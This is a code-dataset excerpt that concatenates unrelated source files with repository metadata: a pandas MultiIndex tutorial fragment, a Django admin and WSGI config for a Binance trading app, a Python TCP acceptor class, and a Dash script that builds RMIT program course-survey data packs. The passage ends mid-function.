# two 44
# six 55
# ...and now the 2nd level of the 1st axis.(第二层优先级的索引)
six_df = df.xs("six", level=1, axis=0)
print(six_df)
# MyData
# AA 22
# BB 55
#Slicing a multi-index with xs, method #2
#http://stackoverflow.com/questions/14964493/multiindex-based-indexing-in-pandas
index = list(itertools.product(['Ada', 'Quinn', 'Violet'], ['Comp', 'Math', 'Sci']))
headr = list(itertools.product(['Exams', 'Labs'], ['I', 'II']))
indx = pd.MultiIndex.from_tuples(index, names=['Stuent', 'Course'])
cols = pd.MultiIndex.from_tuples(headr)
data = [[70+x+y+(x*y)%3 for x in range(4)] for y in range(9)]
df = pd.DataFrame(data,index=indx, columns=cols)
print(df)
# Exams Labs
# I II I II
# Stuent Course
# Ada Comp 70 71 72 73
# Math 71 73 75 74
# Sci 72 75 75 75
# Quinn Comp 73 74 75 76
# Math 74 76 78 77
# Sci 75 78 78 78
# Violet Comp 76 77 78 79
# Math 77 79 81 80
# Sci 78 81 81 81
ALL = slice(None)
violet_df = df.loc['Violet']
print(violet_df)
# Exams Lab
# I II I II
# Course
# Comp 76 77 78 79
# Math 77 79 81 80
# Sci 78 81 81 81
math_df = df.loc[(ALL, 'Math'), ALL]
print(math_df)
# Exams Lab
# I II I II
# Stuent Course
# Ada Math 71 73 75 74
# Quinn Math 74 76 78 77
# Violet Math 77 79 81 80
math_2 = df.loc[(slice('Ada', 'Quinn'), 'Math'), ALL]
print(math_2)
# Exams Labs
# I II I II
# Stuent Course
# Ada Math 71 73 75 74
# Quinn Math 74 76 78 77
math_exams = df.loc[(ALL,'Math'),('Exams')]
print(math_exams)
# I II
# Stuent Course
# Ada Math 71 73
# Quinn Math 74 76
# Violet Math 77 79
math_II = df.loc[(ALL, 'Math'), (ALL, 'II')]
print(math_II)
# Exams Labs
# II II
# Stuent Course
# Ada Math 73 74
# Quinn Math 76 77
# Violet Math 79 80
#Setting portions of a multi-index with xs
#http://stackoverflow.com/questions/19319432/pandas-selecting-a-lower-level-in-a-dataframe-to-do-a-ffill
| [
"ankiyang1201@gmail.com"
] | ankiyang1201@gmail.com |
b4cff199f29e741f20b31e5e5f92df6fd15d82ab | d200a54adcec3a254a909b9689f925c1614f6fb1 | /backend/core/admin.py | a526227756b4d1de8a88c8269f99a134351a5779 | [] | no_license | shusaku-ishikawa/binance | 1bbe7f4aaf32c0ade4f67da7a4c1972f414bfa19 | 60bad0848fa4f4666e2476117a79ee8452326ed1 | refs/heads/master | 2022-01-27T01:35:24.038917 | 2019-11-30T12:42:36 | 2019-11-30T12:42:36 | 204,909,653 | 0 | 1 | null | 2022-01-15T05:20:54 | 2019-08-28T10:50:13 | JavaScript | UTF-8 | Python | false | false | 2,304 | py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
from .models import *
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
from django.conf import settings
from django.utils.safestring import mark_safe
class MyUserChangeForm(UserChangeForm):
class Meta:
model = User
fields = '__all__'
class MyUserCreationForm(UserCreationForm):
class Meta:
model = User
fields = ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb' )
class MyUserAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('email', 'api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password')}),
(_('Personal info'), {'fields': ()}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login',)}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email','api_key', 'api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'password1', 'password2'),
}),
)
form = MyUserChangeForm
add_form = MyUserCreationForm
list_display = ('email', 'api_key','api_secret_key', 'do_btc', 'do_eth', 'do_usdt', 'do_bnb', 'is_staff',)
search_fields = ('email',)
ordering = ('email',)
class SymbolAdmin(admin.ModelAdmin):
#list_display = [field.name for field in Symbol._meta.get_fields()]
list_display = ['symbol', 'from_currency', 'to_currency', 'side']
class OrderSequenceAdmin(admin.ModelAdmin):
list_display = ['t1', 't2', 't3']
class OrderAdmin(admin.ModelAdmin):
list_display = ['symbol', 'order_id', 'quantity', 'quote_quantity', 'price', 'time', 'status']
class OrderSequenceResultAdmin(admin.ModelAdmin):
list_display = ['master', 't1_result', 't2_result', 't3_result', 'profit']
admin.site.register(User, MyUserAdmin)
admin.site.register(Symbol, SymbolAdmin)
admin.site.register(OrderSequence, OrderSequenceAdmin)
admin.site.register(Order, OrderAdmin)
admin.site.register(OrderSequenceResult, OrderSequenceResultAdmin) | [
"ishikawasyuusaku@gmail.com"
] | ishikawasyuusaku@gmail.com |
7978badf89c1cfae0886c4d7231c7369ec2b0e1d | 030445f550d23d6e400e3e944095f816986d6c42 | /travelproject/wsgi.py | 5a330f83a9b6eeec247fac2ecb721d2c1b225db8 | [] | no_license | MidhunBabu01/traveloprj | 9a3536057d0dbca3e2a8e7f2ece3224736fb9dc7 | 49bf31fde7d671a29754ff931ce836a48d6d0c49 | refs/heads/main | 2023-02-12T10:56:40.882787 | 2021-01-13T15:23:37 | 2021-01-13T15:23:37 | 329,349,759 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | """
WSGI config for travelproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'travelproject.settings')
application = get_wsgi_application()
| [
"midhunkb57@gmial.com"
] | midhunkb57@gmial.com |
f98579912b57bed424ce066168325bba2c01ae19 | 275ae35cac0b81bf69cc685ded06c5cdac8ca91a | /tcpacceptor.py | 2f352828b4beed3ca19c0991a5bd34d5ae5623bb | [] | no_license | changshoumeng/python_local-network_file-transfer-service | 2988e8de69b80bf5814b350094272601fc8ab04c | 75a9e5d6001967a775038d3e3dd8af86080a9e2b | refs/heads/master | 2021-01-20T19:34:22.569603 | 2016-06-19T04:16:41 | 2016-06-19T04:16:41 | 61,460,910 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,377 | py | # -*- coding: utf-8 -*-
#Give wisdom to the machine,By ChangShouMeng
import sys,os
import Queue,time
import socket,select,errno
from config import *
from common import *
def getNowTime():
t=time.time()
return int(t)
class SocketStatus:
SOCKET_INIT=0
SOCKET_CONNECTING=1
SOCKET_CONNECTED=2
SOCKET_WOULDCLOSE=3
SOCKET_CLOSED=4
###################################################
# TcpAcceptor 接受器,用户包装accept后的连接
# 子类继承TcpAcceptor,可Overrid以下方法:
# unpackFromBuffer 定制解包逻辑
# makeTask 定制把接收数据包装成一个任务的方法,此task存放在接收队列里
###################################################
class TcpAcceptor(object):
def __init__(self,serverType,acceptSocket,acceptAddr,msgQueue=None):
self.serverType=serverType
self.acceptSocket=acceptSocket
self.acceptAddr=acceptAddr
if msgQueue:
self.messageQueue=msgQueue
else:
self.messageQueue=Queue.Queue()
self.socketState=SocketStatus.SOCKET_CONNECTED
self.recvBuffer=""
self.recvBufSize=1024
self.keepliveTime=getNowTime()
self.sessionId=0
def dumpLog(self,info):
logText="[ses{0}{1}] {2}".format(self.sessionId,self.acceptAddr,info)
dump_log(logText)
def setSessionId(self,sessionId):
self.sessionId = sessionId
def getSessionId(self):
return self.sessionId
def disconnect(self,is_release=True):
if not is_release:
self.socketState=SocketStatus.SOCKET_WOULDCLOSE
return
if SocketStatus.SOCKET_CLOSED == self.socketState:
return
self.socketState=SocketStatus.SOCKET_CLOSED
self.acceptSocket.close()
def isConnected(self) :
return self.socketState == SocketStatus.SOCKET_CONNECTED
def sendData(self,data):
if not self.isConnected():
return
self.acceptSocket.send(data)
###################################################
#callback_method onFdRead
###################################################
def onFdRead(self):
while True:
try:
data = self.acceptSocket.recv(self.recvBufSize)
if not data:
self.dumpLog("onFdRead Zero")
self.disconnect(is_release=False)
return
self.recvBuffer += data
readSize=self.onRead(self.recvBuffer)
self.recvBuffer = self.recvBuffer[readSize:]
pass
except socket.error, msg:
if msg.errno == errno.EAGAIN:
#print "TcpConnector onFdRead EAGAIN<linux>"
break
if msg.errno == errno.EWOULDBLOCK:
#print "TcpConnector onFdRead EWOULDBLOCK<windows>"
break
else:
#(ErrorType, ErrorValue, ErrorTB) = sys.exc_info()
#(errno2, err_msg2) = ErrorValue
log="read error,errno:{0}".format(msg.errno )
self.dumpLog(log)
self.disconnect(is_release=False)
return
###################################################
#callback_method onRead
###################################################
def onRead(self,recvBuffer):
total_size=len(recvBuffer)
begin_pos=0
end_pos=total_size
while begin_pos < end_pos:
leftBuffer=recvBuffer[begin_pos:]
unpack_size=self.unpackFromBuffer(leftBuffer)
if unpack_size < 0:
self.dumpLog("unpackFromBuffer error")
self.disconnect()
break
if unpack_size==0:
break
packet=recvBuffer[begin_pos:begin_pos+unpack_size]
self.dispatchPacket(packet)
begin_pos += unpack_size
return begin_pos
###################################################
#child class must override this interface
###################################################
def unpackFromBuffer(self,leftBuffer):
print "unpackFromBuffer:",len(leftBuffer),leftBuffer
return len(leftBuffer)
###################################################
#callback_method dispatchPacket
###################################################
def dispatchPacket(self,packet):
if not self.messageQueue:
self.dumpLog("dispatchPacket,but self.messageQueue is None")
return
#self.dumpLog( "dispatchPacket,curentRecvQeue size:{0}".format( self.messageQueue.qsize() ))
if self.messageQueue.qsize() > 128:
self.dumpLog( "dispatchPacket Error,self.messageQueue.qsize() too big" )
return
task=self.makeTask(packet)
self.messageQueue.put(task)
#print "TcpConnector dispatchPacket:",packet
pass
##child class must override this interface
def makeTask(self,packet):
return packet
| [
"zhangtao@chelun.com"
] | zhangtao@chelun.com |
c2ac11b48b20e62b2945ba7dd35ed3c6fca2d0a5 | 2760d0bc67865a5d637e2cdd42cf882399fcade9 | /program_pack/Program_DataPack_2019_v2.py | 07bc735f84d1721eb4f7bded24606ab620f1e98e | [] | no_license | pjryan356/CoB | 2406c09988d03a769b0a6ca787dc09bf421265cf | 06e258ffa8a3759795a451abca6b02bfe45abd3b | refs/heads/master | 2021-11-30T23:42:46.747759 | 2021-01-14T22:34:00 | 2021-01-14T22:34:00 | 155,631,641 | 0 | 0 | null | 2021-01-14T22:34:02 | 2018-10-31T22:33:23 | HTML | UTF-8 | Python | false | false | 42,097 | py | ## Program CES Data Pack
# Peter Ryan Feb 2019
import base64
import flask
import dash
import pandas as pd
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from collections import OrderedDict
from tabulate import tabulate
from IPython.core.interactiveshell import InteractiveShell
import sys
sys.path.append('c:\\Peter\\GitHub\\CoB\\')
import general.RMIT_colours as rc
from general.sams_helper_functions import (return_sams_engine)
from general.sams_queries import (
qry_program_course_structure
)
from general.postgres_queries import (
qry_course_enhancement_list
)
from general.db_helper_functions import (
connect_to_postgres_db,
db_extract_query_to_dataframe
)
from course_pack.Course_enhancement_graphs import (
line_graph_measure_surveys,
line_graph_gtsq_surveys,
generate_ces_pd_table,
)
from Program_graphs import (
line_graph_crse_prg,
line_graph_prg_crses,
line_graph_crse_prg_enrol,
line_graph_crse_prg_current
)
from course_pack.Course_enhancement_functions import (
get_term_name,
get_course_pop,
get_gts_questions
)
'''
This script is designed to a Program level CES Data Pack.
Get the program structure from the SAMS database
'''
'''------------------------------------- Get Inputs --------------------------------'''
# Set parameter values with input prompts or go with preset values (input prompt)
# Get Program Code
#program_code = input("Program Code: ") ## Input password
program_code_test = [
'MC192',
'BP027',
'BP253',
'BP030',
'BP129',
'BP134',
'BP138',
'BP141',
'BP143',
'BP217',
'BP251',
'BP252',
'BP254',
'BP255',
'BP276',
'BP308',
'BP314',
'BP313',
'BP324',
'MC161',
'MC162',
'MC194',
'MC196',
'MC197',
'MC198',
'MC199',
'MC200',
'MC201',
'MC205',
'MC260',
'MC263',
'MC276',]
#program_code_test = 'BP253'
start_year = 2016
end_year = 2019
semester = 2
# Setup app
app = dash.Dash(__name__)
app.css.config.serve_locally = True
app.scripts.config.serve_locally = True
''' ------------------- Add a css file to configure settings and layouts-------------'''
# The main css file used was copied from https://codepen.io/chriddyp/pen/bWLwgP.css
# When used 'directly' it had an undo/redo button located in bottom left corner of every page
# This was 'fixed' by appending the 'remove_undo.css' file
# In order to work the css files had to appended using the methodology outlined at
# https://community.plot.ly/t/how-do-i-use-dash-to-add-local-css/4914/2
## I do not fully understand how this works and sometimes it messes up
# app.css.append_css({"external_url": "https://codepen.io/chriddyp/pen/bWLwgP.css"}) # direct css usage
'''--------------------------------- Connect to Database ----------------------------'''
# create postgres engine this is the connection to the postgres database
# Credentials: password prompted interactively; the rest are fixed for a
# local postgres instance.
postgres_pw = input("Postgres Password: ")
postgres_user = 'pjryan'
postgres_host = 'localhost'
postgres_dbname = 'postgres'
con_string = "host='{0}' " \
             "dbname='{1}' " \
             "user='{2}' " \
             "password='{3}' " \
             "".format(postgres_host, postgres_dbname, postgres_user, postgres_pw)
# connect_to_postgres_db returns (connection, cursor); the cursor is what the
# query helper functions below take as `cur`.
postgres_con, postgres_cur = connect_to_postgres_db(con_string)
'''------------------------Get Images---------------------'''
# Images are read once at start-up and base64-encoded for embedding in the
# Dash layout.
# NOTE(review): the file handles opened here are never closed (resource
# leak); consider a `with open(...)` block.
# header image
image_filename = 'C:\\Peter\\CoB\\logos\\Logo_COBL_transparent_200.png' # replace with your own image
logo = base64.b64encode(open(image_filename, 'rb').read())
# ces scale image (3 explanation)
image_filename = 'C:\\Peter\\CoB\\logos\\CES_scale2.png' # replace with your own image
ces_scale_image = base64.b64encode(open(image_filename, 'rb').read())
'''------------------------------ Helper functions -----------------------------------'''
def list_to_text(obList):
  """Convert a list of objects into a quoted, parenthesised string for a
  SQL IN clause, e.g. ['a', 'b'] -> "('a','b')".

  Fix: the original built the string with += and stripped the last
  character, so an empty list produced the malformed string ")"; an empty
  list now yields "()".

  NOTE(review): values are embedded verbatim with no escaping -- safe only
  for trusted, internally generated lists such as course/program codes.
  """
  return "({})".format(",".join("'{}'".format(ob) for ob in obList))
def get_courses_data(df1, course_list):
  """Return the rows of *df1* whose 'course_code' column is in *course_list*.

  Returns None when the filter cannot be applied (e.g. df1 is None or has
  no 'course_code' column), preserving the original best-effort contract.
  Fix: narrowed the bare `except:` (which also swallowed KeyboardInterrupt
  and SystemExit) to `except Exception`.
  """
  try:
    return df1.loc[df1['course_code'].isin(course_list)]
  except Exception:
    return None
def get_program_data(df1, code, plan=None):
  """Return the rows of *df1* whose 'program_code' equals *code*.

  *plan* is accepted for interface compatibility but is currently unused.
  Returns None when the filter cannot be applied (e.g. df1 is None or has
  no 'program_code' column), preserving the original best-effort contract.
  Fix: narrowed the bare `except:` to `except Exception`.
  """
  try:
    return df1.loc[df1['program_code'] == code]
  except Exception:
    return None
'''----------------------------- create data extraction functions -------------------------------------'''
def get_course_enhancement_list(year, semester, cur, schema='course_enhancement'):
  """Return a DataFrame of courses undergoing enhancement in the given
  year/semester, read through database cursor *cur*."""
  sql = qry_course_enhancement_list(year, semester, 'vw100_courses', schema)
  return db_extract_query_to_dataframe(sql, cur, print_messages=False)
def get_course_ces_data(course_list, start_year, end_year, cur, tbl='vw1_course_summaries_fixed', schema='ces'):
  # Returns a dataframe with CES data for courses in course list:
  # one row per course/year/semester with GTS/OSI measures rounded to 1 dp,
  # plus coordinator, population and response counts.
  # NOTE(review): course codes and years are interpolated straight into the
  # SQL text (no parameter binding) -- acceptable only because the inputs
  # are internally generated, never user-supplied.
  qry = ' SELECT \n' \
        " year, semester, level, \n" \
        " course_code, \n" \
        " course_code_ces, \n" \
        ' reliability, round(gts, 1) AS gts, round(gts_mean, 1) AS gts_mean, \n' \
        ' round(osi, 1) AS osi, round(osi_mean, 1) AS osi_mean, \n' \
        ' round(gts1, 1) AS gts1, round(gts2, 1) AS gts2, round(gts3, 1) AS gts3, \n' \
        ' round(gts4, 1) AS gts4, round(gts5, 1) AS gts5, round(gts6, 1) AS gts6, \n' \
        ' course_coordinator, population, osi_count, gts_count \n' \
        ' FROM {0}.{1} \n' \
        " WHERE course_code IN {2} \n" \
        " AND year >= {3} \n" \
        " AND year <= {4} \n" \
        " ORDER BY course_code, year, semester; \n" \
        "".format(schema, tbl,
                  list_to_text(course_list),
                  start_year,
                  end_year)
  return db_extract_query_to_dataframe(qry, cur, print_messages=False)
def get_course_program_ces_data(course_list, program_list, start_year, end_year, cur, tbl='vw115_course_program', schema='ces'):
  # Returns a dataframe with CES data for courses in course list, split by
  # enrolling program, joined to program/school/college lookup details
  # (names and display colours). Non-CoB programs are labelled 'Not CoB'.
  # NOTE(review): identifiers and values are interpolated straight into the
  # SQL text -- acceptable only for internally generated inputs.
  qry = ' SELECT \n' \
        '    crse_prg.*, \n' \
        '    pd.program_name, \n' \
        "    CASE WHEN pd.college = 'BUS' THEN pd.school_code ELSE 'Not CoB' END AS school_code, \n" \
        "    COALESCE(bsd.school_name_short, 'Not CoB') AS school_name_short, \n" \
        "    CASE WHEN pd.college = 'BUS' THEN bsd.html ELSE '#FAC800' END AS school_colour, \n" \
        "    pd.college, \n" \
        "    col.college_name_short, \n" \
        "    col.html AS college_colour \n " \
        ' FROM ( \n' \
        '   SELECT \n' \
        "     year, semester, level, \n" \
        "     course_code, course_code_ces, program_code, \n" \
        '     reliability, \n' \
        '     round(gts, 1) AS gts, round(gts_mean, 1) AS gts_mean, \n' \
        '     round(osi, 1) AS osi, round(osi_mean, 1) AS osi_mean, \n' \
        '     round(gts1, 1) AS gts1, round(gts2, 1) AS gts2, round(gts3, 1) AS gts3, \n' \
        '     round(gts4, 1) AS gts4, round(gts5, 1) AS gts5, round(gts6, 1) AS gts6, \n' \
        '     population::int, osi_count, gts_count \n' \
        '   FROM {0}.{1} \n' \
        "   WHERE course_code IN {2} \n" \
        "     AND year >= {3} \n" \
        "     AND year <= {4} \n" \
        "   ) crse_prg \n" \
        " LEFT JOIN ( \n" \
        "   SELECT program_code, program_name, school_code, college \n" \
        "   FROM lookups.tbl_program_details \n" \
        "   ) pd ON (crse_prg.program_code = pd.program_code) \n" \
        " LEFT JOIN ( \n" \
        "   SELECT sd.school_code, sd.school_name_short, sc.html \n" \
        "   FROM (SELECT school_code, school_name_short, colour FROM lookups.tbl_bus_school_details) sd \n" \
        "   LEFT JOIN (SELECT colour_name, html FROM lookups.tbl_rmit_colours) sc \n" \
        "     ON sc.colour_name = sd.colour \n" \
        "   ) bsd ON (pd.school_code=bsd.school_code)\n" \
        " LEFT JOIN ( \n" \
        "   SELECT cd.college_code, cd.college_name, cd.college_name_short, rc.html \n" \
        "   FROM lookups.tbl_rmit_college_details cd, lookups.tbl_rmit_colours rc \n" \
        "   WHERE rc.colour_name = cd.colour \n" \
        "   ) col ON (pd.college = col.college_code) \n" \
        " WHERE crse_prg.program_code IN {5} \n" \
        " ORDER BY course_code, year, semester; \n" \
        "".format(schema, tbl,
                  list_to_text(course_list),
                  start_year,
                  end_year,
                  list_to_text(program_list))
  return db_extract_query_to_dataframe(qry, cur, print_messages=False)
def get_prg_ces_data(program_list, start_year, end_year, cur, tbl='vw135_program', schema='ces'):
  # Returns a dataframe with program-level CES data for the programs in
  # program_list: one row per program/year/semester with GTS/OSI measures
  # rounded to 1 dp.
  # NOTE(review): values are interpolated straight into the SQL text --
  # acceptable only for internally generated inputs.
  qry = ' SELECT \n' \
        "   year, semester, level, \n" \
        "   program_code, \n" \
        '   population::int, reliability, \n' \
        '   osi_count, \n' \
        '   round(gts::numeric, 1) AS gts, round(gts_mean::numeric, 1) AS gts_mean, \n' \
        '   round(osi::numeric, 1) AS osi, round(osi_mean::numeric, 1) AS osi_mean, \n' \
        '   round(gts1::numeric, 1) AS gts1, round(gts2::numeric, 1) AS gts2, round(gts3::numeric, 1) AS gts3, \n' \
        '   round(gts4::numeric, 1) AS gts4, round(gts5::numeric, 1) AS gts5, round(gts6::numeric, 1) AS gts6 \n' \
        ' FROM {0}.{1} \n' \
        " WHERE program_code IN {2} \n" \
        "   AND year >= {3} \n" \
        "   AND year <= {4} \n" \
        " ORDER BY year, semester; \n" \
        "".format(schema, tbl,
                  list_to_text(program_list),
                  start_year,
                  end_year)
  return db_extract_query_to_dataframe(qry, cur, print_messages=False)
def get_prg_crse_data(program_list, cur):
  """Return the full plan/course structure rows for the given programs,
  read from programs.tbl_plan_course_structure via cursor *cur*."""
  sql = (
    " SELECT * \n"
    " FROM programs.tbl_plan_course_structure \n"
    " WHERE program_code IN {} ".format(list_to_text(program_list))
  )
  return db_extract_query_to_dataframe(sql, cur, print_messages=False)
'''-------------------------------------------- Create Dataframes -------------------------------------'''
# All CES/structure data is pulled once at start-up; the dash layout
# functions below read from these module-level dataframes.
df_prg_crse = get_prg_crse_data(program_code_test, cur=postgres_cur)
# One row per program/plan. Fix: the original passed a drop_duplicates()
# subset containing a misspelt column ('school_abr') and a duplicated
# 'campus', which raises KeyError on current pandas; deduplicating on all
# selected columns matches the evident intent.
df_prg = df_prg_crse[['program_code', 'plan_code', 'program_name', 'program_level', 'school_abbr', 'campus']].drop_duplicates()
df_prg = df_prg.loc[df_prg['campus'] == 'AUSCY']  # Melbourne city campus plans only
df_schools = df_prg[['school_abbr']].drop_duplicates()
df_crses = df_prg_crse[['course_code', 'course_name', 'ams_block_nbr', 'clist_name']].drop_duplicates()
# Course-level CES split by program, program-level CES, and overall course CES.
df_crse_prg_ces = get_course_program_ces_data(df_crses['course_code'].tolist(),
                                              df_prg['program_code'].tolist(),
                                              start_year,
                                              end_year,
                                              cur=postgres_cur)
df_prg_ces = get_prg_ces_data(df_prg['program_code'].tolist(),
                              start_year,
                              end_year,
                              cur=postgres_cur)
df_crse_ces = get_course_ces_data(df_crses['course_code'].tolist(),
                                  start_year,
                                  end_year,
                                  cur=postgres_cur)
# ams_block_nbr 1 == first-year courses.
df_crses_year = df_crses.loc[(df_crses['ams_block_nbr'] == 1)]
'''----------------------------- create dash functions -------------------------------------'''
def create_school_options():
  """Build the dropdown options for the school selector: an 'All' entry
  followed by one option per school, sorted by school abbreviation.

  Fix: the original called df_schools.sort_values(...) but discarded the
  returned (sorted) frame and iterated the unsorted original, so the
  options were never actually sorted.
  """
  sorted_schools = df_schools.sort_values(['school_abbr'])
  options = [{'label': '{0}'.format(r['school_abbr']),
              'value': r['school_abbr']} for i, r in sorted_schools.iterrows()]
  options.insert(0, {'label': 'All', 'value': None})
  return options
def create_program_options(df1, school=None):
  """Build the program-selector dropdown options, optionally restricted to
  one school, with an 'All' entry prepended.

  df1 -- dataframe with 'program_code', 'program_name' and 'school_abbr'
  school -- school abbreviation to filter on; None keeps every program
  """
  if school is None:
    filtered = df1
  else:
    filtered = df1.loc[df1['school_abbr'] == school]
  options = [{'label': 'All', 'value': None}]
  for _, row in filtered.sort_values(['program_code']).iterrows():
    options.append({'label': '{0}: {1}'.format(row['program_code'],
                                               row['program_name']),
                    'value': row['program_code']})
  return options
def make_program_level_page(program_code, level, df1_prg_ces, gts_list):
  """Build the program-level (first) page of the data pack.

  Layout: row 1 holds the OSI/GTS trend graph and the CES summary table;
  row 2 holds the per-question GTS trend graph and the question wording.

  program_code -- program to chart
  level -- academic career code passed to the GTS-question graph
           (presumably 'HE'/'VE' as returned by the CES data -- confirm)
  df1_prg_ces -- program-level CES dataframe already filtered to this program
  gts_list -- seven strings: the six GTS question texts plus a footnote
  """
  # First Page - CES quantitative data
  child = [
    # First Row - OSI & GTS overtime graph and CES overtime table
    html.Div(
      [
        # OSI & GTS Graph
        html.Div(
          [
            dcc.Graph(
              id='gts-graph',
              figure=line_graph_measure_surveys(
                df1_prg_ces,
                program_code,
                ['gts', 'osi'],
                start_year, end_year,
                semester=None,
                width=540,
                height=318
              ),
              style={'margin': 0,
                     },
            )
          ],
          className='six columns',
          style={
            'width': '50%',
            'margin-left': 0,
            'margin-right': 0,
            'border': 'solid',
          }
        ),
        # CES Table
        html.Div(
          children=[
            dcc.Graph(
              id='ces-table',
              figure=generate_ces_pd_table(df1_prg_ces,
                                           program_code,
                                           width=530,
                                           height=310),
              style={
                'margin': 0,
                'margin-top': 4,
                'margin-bottom': 4,
                'margin-left': 10,
                'margin-right': 10,
              },
            )
          ],
          className='six columns',
          style={
            'width': '50%',
            'margin': 0,
            'margin-left': 0,
            'margin-right': 0,
            'border': 'solid',
          },
        ),
      ],
      className='twelve columns',
      style={},
    ),
    # Second Row - Individual GTS questions graph and CES questions list
    html.Div(
      [
        # Individual GTS questions overtime graph
        html.Div(
          [
            dcc.Graph(
              id='gtsi-graph',
              figure=line_graph_gtsq_surveys(
                df1_prg_ces,
                program_code,
                start_year,
                end_year, semester=None,
                acad_career=level,
                width=540,
                height=318),
              style={'margin': 0},
            )
          ],
          className='six columns',
          style={'width': '50%',
                 'margin': 0,
                 'margin-right': 0,
                 'border': 'solid',
                 },
        ),
        # CES question explanations (OSI wording, the six GTS questions and
        # the footnote supplied in gts_list[6])
        html.Div(
          [
            html.P([dcc.Markdown('**OSI:** {}'.format('Overall I am satisfied with the quality of this course'))],
                   style={'margin-top': 10,
                          'margin-bottom': 0,
                          'margin-left': 5,
                          'font-size': 16}),
            html.P(['GTS Questions'],
                   style={'margin-top': 5,
                          'margin-bottom': 0,
                          'margin-left': 5,
                          'font-size': 16,
                          'font-weight': 'bold'}),
            html.P(['Q1: {}'.format(gts_list[0])], style={'margin-top': 0,
                                                          'margin-bottom': 0,
                                                          'margin-left': 5,
                                                          'font-size': 16}),
            html.P(['Q2: {}'.format(gts_list[1])], style={'margin-top': 0,
                                                          'margin-bottom': 0,
                                                          'margin-left': 5,
                                                          'font-size': 16}),
            html.P(['Q3: {}'.format(gts_list[2])], style={'margin-top': 0,
                                                          'margin-bottom': 0,
                                                          'margin-left': 5,
                                                          'font-size': 16}),
            html.P(['Q4: {}'.format(gts_list[3])], style={'margin-top': 0,
                                                          'margin-bottom': 0,
                                                          'margin-left': 5,
                                                          'font-size': 16}),
            html.P(['Q5: {}'.format(gts_list[4])], style={'margin-top': 0,
                                                          'margin-bottom': 0,
                                                          'margin-left': 5,
                                                          'font-size': 16}),
            html.P(['Q6: {}'.format(gts_list[5])], style={'margin-top': 0,
                                                          'margin-bottom': 0,
                                                          'margin-left': 5,
                                                          'font-size': 16}),
            html.P([dcc.Markdown('{}'.format(gts_list[6]))],
                   style={'margin-top': 5,
                          'margin-left': 5,
                          'font-size': 16}),
          ],
          className='six columns',
          style={'width': '50%',
                 'margin-bottom': 0,
                 'margin-left': 0,
                 'margin-right': 0,
                 'font-size': 16,
                 'border': 'solid',
                 'height': 320
                 }
        ),
      ],
      className='twelve columns',
      style={
        'margin-bottom': 0,
        'margin-top': 0,
        'margin-left': 0,
        'margin-right': 0}
    )
  ]
  return child
def make_course_div(crse, course_code, program_code):
  """Build the 2x2 grid of CES graphs for one course within a program.

  Top row: course GTS vs this program's cohort; this course vs the
  program's other core courses. Bottom row: enrolment counts over time;
  the current-semester comparison chart.

  crse -- dataframe row(s) for this course (passed through; shape is
          whatever df_crses provides -- not used directly here)
  course_code -- course being charted
  program_code -- program whose cohort the course data is split by
  Reads module-level dataframes df_crse_ces, df_crse_prg_ces, df_prg_ces
  and the globals start_year, end_year, semester.
  """
  height = 330
  # create 4 charts
  # CRSE vs CRSE(PRG) GTS Graph
  crse_div = html.Div(
    [
      dcc.Graph(
        id='crse-gts-graph-{}'.format(course_code),
        figure=line_graph_crse_prg(
          df_crse_ces,
          df_crse_prg_ces,
          course_code,
          program_code,
          'gts',
          start_year, end_year,
          semester=None,
          width=545,
          height=height),
        style={'margin': 0},
      )
    ],
    className='six columns',
    style={'width': '50%',
           'margin': 0,
           'border': 'solid'
           }
  )
  # PRG Core Courses GTS Graph
  prg_crses_div = html.Div(
    [
      dcc.Graph(
        id='crses-gts-graph-{}'.format(course_code),
        figure=line_graph_prg_crses(
          df_prg_ces,
          df_crse_prg_ces,
          course_code,
          program_code,
          'gts',
          start_year, end_year,
          semester=None,
          width=545,
          height=height),
        style={'margin': 0},
      )
    ],
    className='six columns',
    style={'width': '50%',
           'margin': 0,
           'border': 'solid'
           }
  )
  # Enrolments Graph
  enrol_div = html.Div(
    [
      dcc.Graph(
        id='enrol-graph-{}'.format(course_code),
        figure=line_graph_crse_prg_enrol(
          df_crse_ces,
          df_crse_prg_ces,
          course_code,
          program_code,
          start_year, end_year,
          semester=None,
          width=545,
          height=height),
        style={'margin': 0,
               'margin-bottom': 1,
               },
      )
    ],
    className='six columns',
    style={'width': '50%',
           'margin': 0,
           'border': 'solid'
           }
  )
  # Current-semester comparison graph (uses the module-level `semester`)
  current_div= html.Div(
    [
      dcc.Graph(
        id='current-graph-{}'.format(course_code),
        figure=line_graph_crse_prg_current(
          df_prg_ces,
          df_crse_ces,
          df_crse_prg_ces,
          course_code,
          program_code,
          year=2019,
          semester=semester,
          width=545,
          height=height),
        style={'margin': 0,
               'margin-bottom': 1,},
      )
    ],
    className='six columns',
    style={'width': '50%',
           'margin': 0,
           'border': 'solid'
           }
  )
  # Assemble the four graphs into two rows of two columns each.
  div = html.Div(
    [
      # Row1
      html.Div(
        [
          crse_div,
          prg_crses_div
        ],
        className='twelve columns ',
      ),
      # Row2
      html.Div(
        [
          enrol_div,
          current_div
        ],
      ),
    ],
    className='twelve columns',
  )
  return div
def make_program_year_level_page(program_code, year_level, limit=None):
    """Build one page of per-course chart grids for a single year level.

    program_code -- program whose header/cohort lines are drawn.
    year_level   -- value matched against df_crses['ams_block_nbr'].
    limit        -- optional cap on how many courses are rendered; defaults
                    to every distinct course in the year level.  (Fixed: a
                    limit larger than the course list no longer raises.)
    """
